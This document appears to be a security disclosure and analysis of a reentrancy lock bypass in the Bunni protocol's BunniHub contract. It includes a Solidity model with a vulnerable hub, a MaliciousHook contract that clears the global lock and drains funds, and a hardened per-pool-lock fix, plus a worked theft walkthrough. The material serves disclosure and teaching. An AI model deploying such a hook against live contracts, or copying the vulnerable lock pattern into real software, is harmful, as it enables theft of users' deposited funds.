Full Report
BunniHub is the pool contract of the Bunni protocol. It had a vulnerability that allowed a user-defined hook to call back into the contract while a pool was in an unintended state, a classic reentrancy, which inevitably would have led to lost user funds. Pashov Audit Group found this reentrancy during its audit (finding C-03 in its report). To mitigate it, the Bunni team introduced a pair of functions to prevent reentrancy, lockForRebalance and unlockForRebalance, locking the pool before a rebalance order and unlocking it once the order had executed.

These locks are per contract, not per pool. A Bunni pool can have a hook contract registered for it by anyone, and that hook is what triggers the lock and unlock. Since the lock is global, an attacker can create a pool with their own hook contract, call it, and clear the reentrancy lock themselves. From there the manipulation is the same as before and leads to loss of funds. Cyfrin, a web3 auditing company, found this bypass. To patch the issue immediately, the Bunni team added a whitelist of addresses allowed to execute rebalancing actions, which, in theory, prevented the attack.

To be cautious, the team asked Cyfrin whether any other reentrancy attacks were still possible, and Cyfrin researched further. They found a similar vulnerability when interacting with a malicious ERC-4626 vault, which broke the pool's accounting and allowed withdrawing more assets than the caller was entitled to. To resolve this new issue, the affected rebalancing functionality was paused until a proper fix could be made. The contracts were audited by Pashov Audit Group and Trail of Bits, and they are currently being audited by Cyfrin as part of the Uniswap Foundation Security Fund.

Patching vulnerabilities is hard; a suggested patch needs to be taken as seriously as the original finding, and reviewed for the same class of bug it is meant to fix. Otherwise, you end up with more issues like this.
Analysis Summary
# Vulnerability: BunniHub Reentrancy Lock Bypass and Accounting Manipulation
## CVE Details
- **CVE ID**: Not yet assigned (Protocol-specific bug disclosure)
- **CVSS Score**: 9.1 - 10.0 (Team assessment: **Critical**)
- **CWE**: CWE-841 (Improper Enforcement of Behavioral Workflow, the CWE that SWC-107 Reentrancy maps to), CWE-602 (Client-Side Enforcement of Server-Side Security), CWE-670 (Always-Incorrect Control Flow Implementation)
## Affected Systems
- **Products**: Bunni Protocol (BunniHub)
- **Versions**: Production deployments prior to May 2, 2025
- **Configurations**: Any Bunni pool using the `BunniHub` contract with `am-AMM` (auction-managed AMM) rebalancing enabled, or with custom hooks or ERC-4626 vaults registered.
## Vulnerability Description
The vulnerability consists of two primary flaws stemming from an inadequate security patch for a previous reentrancy finding (C-03):
1. **Global Lock Manipulation**: BunniHub implemented `lockForRebalance()` and `unlockForRebalance()` to prevent reentrancy during complex pool operations. However, these locks were global rather than per-pool. Because any user could register a pool with a malicious `hook` contract, an attacker could call `unlockForRebalance()` from their own malicious hook to disable the global reentrancy protection for the entire protocol.
2. **ERC-4626 Vault Accounting Flaw**: A secondary issue involved malicious ERC-4626 vaults. Interacting with a pool's vault could trigger `_updateRawBalanceIfNeeded()`, and a malicious vault/hook combination gave the attacker a callback between the pool's state transitions and its final accounting updates. By re-entering in that window and manipulating the cached pool reserves, the attacker could withdraw more assets than they were entitled to.
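A minimal Solidity model of the first flaw, added here as an illustration; it is not BunniHub's code. The contract names, the `beforeRebalance` callback, the pro-rata share accounting, the cached-reserve write-back and the `rebalancer` whitelist are all assumptions standing in for the real protocol's logic. `VulnerableHub` keeps one contract-wide lock that any registered hook may clear; `MaliciousHook` clears it from inside its own callback and re-enters `withdraw`; `HardenedHub` keys the lock per pool and exposes no unlock entry point at all, with the `rebalancer` whitelist modelling the interim workaround.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Hypothetical model of the lock-bypass class discussed above, not Bunni's code: the contract
// names, `beforeRebalance` callback, pro-rata share accounting, cached-reserve write-back and
// `rebalancer` whitelist are all invented here for illustration.

interface IRebalanceHook {
    function beforeRebalance(bytes32 poolId) external;
}

/// Shared storage: anyone registers a pool with their own hook; shares redeem pro rata against `reserve`.
abstract contract PoolStorage {
    mapping(bytes32 => address) public hookOf;   // poolId => hook
    mapping(address => bool) public isHook;      // reverse index used by the weak lock check
    mapping(bytes32 => uint256) public reserve;  // poolId => accounted ETH reserve
    mapping(bytes32 => uint256) public totalShares;
    mapping(bytes32 => mapping(address => uint256)) public shares;

    function registerPool(bytes32 poolId, address hook) external {
        require(hookOf[poolId] == address(0), "pool exists");
        hookOf[poolId] = hook;
        isHook[hook] = true;
    }

    function deposit(bytes32 poolId) external payable {
        uint256 minted = totalShares[poolId] == 0
            ? msg.value : msg.value * totalShares[poolId] / reserve[poolId];
        reserve[poolId] += msg.value;
        totalShares[poolId] += minted;
        shares[poolId][msg.sender] += minted;
    }

    function _redeem(bytes32 poolId, uint256 burn) internal {
        uint256 amount = burn * reserve[poolId] / totalShares[poolId];
        shares[poolId][msg.sender] -= burn;      // checked math: reverts if over-redeeming
        totalShares[poolId] -= burn;
        reserve[poolId] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

/// Vulnerable shape: one contract-wide flag that any registered hook may set or clear.
contract VulnerableHub is PoolStorage {
    bool public rebalanceLocked;
    function lockForRebalance() external { require(isHook[msg.sender]); rebalanceLocked = true; }
    function unlockForRebalance() external { require(isHook[msg.sender]); rebalanceLocked = false; }

    function rebalance(bytes32 poolId) external {
        rebalanceLocked = true;
        uint256 cached = reserve[poolId];                        // snapshot before the callback
        IRebalanceHook(hookOf[poolId]).beforeRebalance(poolId);  // untrusted external call
        reserve[poolId] = cached;   // write-back assumes nothing moved during the callback
        rebalanceLocked = false;
    }

    function withdraw(bytes32 poolId, uint256 burn) external {
        require(!rebalanceLocked, "rebalance in progress");
        _redeem(poolId, burn);
    }
}

/// Attacker's hook for a pool the attacker registered. The lock check only asks "is the caller
/// some hook?", so the hook clears the global flag inside the callback and re-enters `withdraw`.
/// `rebalance` then restores the stale `reserve` while `totalShares` stays reduced, so every
/// remaining share is priced above the ETH the pool actually holds.
contract MaliciousHook is IRebalanceHook {
    VulnerableHub public immutable hub;
    constructor(VulnerableHub _hub) { hub = _hub; }
    function fund(bytes32 poolId) external payable { hub.deposit{value: msg.value}(poolId); }
    function beforeRebalance(bytes32 poolId) external {
        hub.unlockForRebalance();
        hub.withdraw(poolId, hub.shares(poolId, address(this)));
    }
    receive() external payable {}
}

/// Hardened shape: the lock is keyed per pool and only the hub itself sets or clears it, so
/// nothing reachable from the callback can unlock. `rebalancer` models the interim whitelist
/// workaround; the internal per-pool lock is the structural fix.
contract HardenedHub is PoolStorage {
    mapping(bytes32 => bool) public locked;
    mapping(address => bool) public rebalancer;
    constructor() { rebalancer[msg.sender] = true; }

    modifier nonReentrantPool(bytes32 poolId) {
        require(!locked[poolId], "rebalance in progress");
        locked[poolId] = true;
        _;
        locked[poolId] = false;
    }

    function rebalance(bytes32 poolId) external nonReentrantPool(poolId) {
        require(rebalancer[msg.sender], "not a whitelisted rebalancer");
        uint256 cached = reserve[poolId];
        IRebalanceHook(hookOf[poolId]).beforeRebalance(poolId);
        reserve[poolId] = cached;
    }

    // A hook re-entering here during its own pool's rebalance now reverts on the lock check.
    function withdraw(bytes32 poolId, uint256 burn) external nonReentrantPool(poolId) {
        _redeem(poolId, burn);
    }
}
```

Walking the vulnerable contract through the model by hand: the attacker registers pool P with a `MaliciousHook`, funds 100 ETH through the hook, deposits another 100 ETH from a second account, and a victim deposits 100 ETH, so `reserve` and `totalShares` are both 300. The attacker then calls `rebalance(P)`: the snapshot is 300; inside the callback the hook unlocks, redeems its 100 shares for 100 ETH, leaving `reserve` and `totalShares` at 200; the write-back then sets `reserve` back to 300 against only 200 shares. The attacker's second account now redeems 100 shares for 100 * 300 / 200 = 150 ETH, so the attacker has taken 250 ETH for 200 deposited while the contract holds 50 ETH against the victim's 100 shares. Against `HardenedHub` the same hook's `withdraw` call reverts on `locked[poolId]`, and a stray `unlockForRebalance()` call simply does not exist; the whitelist on `rebalance` additionally keeps an unvetted hook from being driven by an arbitrary caller, which is the workaround the text describes, but it is the per-pool, internal-only lock that removes the bug class.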
## Exploitation
- **Status**: PoC available (confirmed by Cyfrin and Bunni team); Not exploited in the wild.
- **Complexity**: High (Requires deploying malicious hooks and ERC-4626 vaults and orchestrating multi-step reentrancy).
- **Attack Vector**: Network (Smart Contract Interaction).
## Impact
- **Confidentiality**: None
- **Integrity**: Critical (Complete corruption of pool accounting)
- **Availability**: High (Led to protocol-wide pausing of rebalancing features)
- **Total Impact**: Possible total loss of Total Value Locked (TVL) across all `BunniHub` assets.
## Remediation
### Patches
- The protocol is currently undergoing a comprehensive audit by **Cyfrin** under the Uniswap Foundation Security Fund. Fixed contracts are pending deployment following the conclusion of this audit.
### Workarounds
- **Function Pausing**: The Bunni team utilized the contract's emergency "partial pause" feature to disable `BunniHub::unlockForRebalance()`.
- **Whitelist Implementation**: An immediate temporary fix involved whitelisting specific addresses authorized to execute rebalancing actions, effectively neutralizing the permissionless nature of the malicious hook attack.
## Detection
- **Indicators of Compromise**: Transactions calling `unlockForRebalance()` from unauthorized or newly deployed hook contracts; unexpected discrepancies between `BunniHub` internal raw balances and actual vault reserves.
- **Detection Methods**: Monitoring for re-entrant call patterns on-chain (a hook calling back into `BunniHub` while a `BunniHub` call is still in progress); review of newly registered hooks so that only audited or trusted hooks can reach the global state locks.
## References
- Bunni Diaries Bug Disclosure: hxxps://blog[.]bunni[.]xyz/posts/bug-disclosure-reentrancy-lock-bypass/
- Pashov Audit Report: hxxps://github[.]com/pashov/audits/blob/master/team/pdf/Bunni-security-review-August[.]pdf
- Cyfrin Security: hxxps://www[.]cyfrin[.]io/